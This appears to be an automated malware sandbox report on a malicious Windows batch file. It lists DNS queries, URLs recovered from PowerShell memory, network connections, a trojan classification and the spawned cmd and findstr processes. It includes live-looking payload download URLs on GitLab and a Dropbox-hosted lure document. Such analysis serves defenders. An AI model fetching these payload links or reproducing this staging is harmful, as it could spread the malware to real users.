dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                Source: global trafficDNS traffic detected: DNS query: uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com
                Source: global trafficDNS traffic detected: DNS query: gitlab.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                Source: powershell.exe, 0000000C.00000002.1364904117.00000197325E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1364904117.00000197324A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.00000187490CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.00000187576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019722431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018747661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.00000256573BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019722431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018747661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.0000025657343000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.000002565737F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                Source: powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                Source: powershell.exe, 0000000E.00000002.2460772669.000001874576F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462979949.0000018745980000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip
                Source: powershell.exe, 0000000E.00000002.2520913023.000001875F7F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/fgh8090051/jgh/-/raw/main/fga1812.zip
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.00000256578E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                Source: powershell.exe, 0000000C.00000002.1364904117.00000197325E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1364904117.00000197324A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.00000187576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com/cd/0/get/CghgEBbI7BWE-ZfTAruPVm3dHgMT
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                Source: powershell.exe, 0000000C.00000002.1349620298.000001972079E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019722662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350076197.0000019720940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.do
                Source: powershell.exe, 0000000C.00000002.1369108486.000001973A730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/garmin_campaign_information_for_partners_v11.do
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                Source: powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.10:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.10:49729 version: TLS 1.2
                Source: classification engineClassification label: mal88.troj.evad.winBAT@28/16@3/2
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jeso5jma.532.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\jhsdgfjkh236.bat"
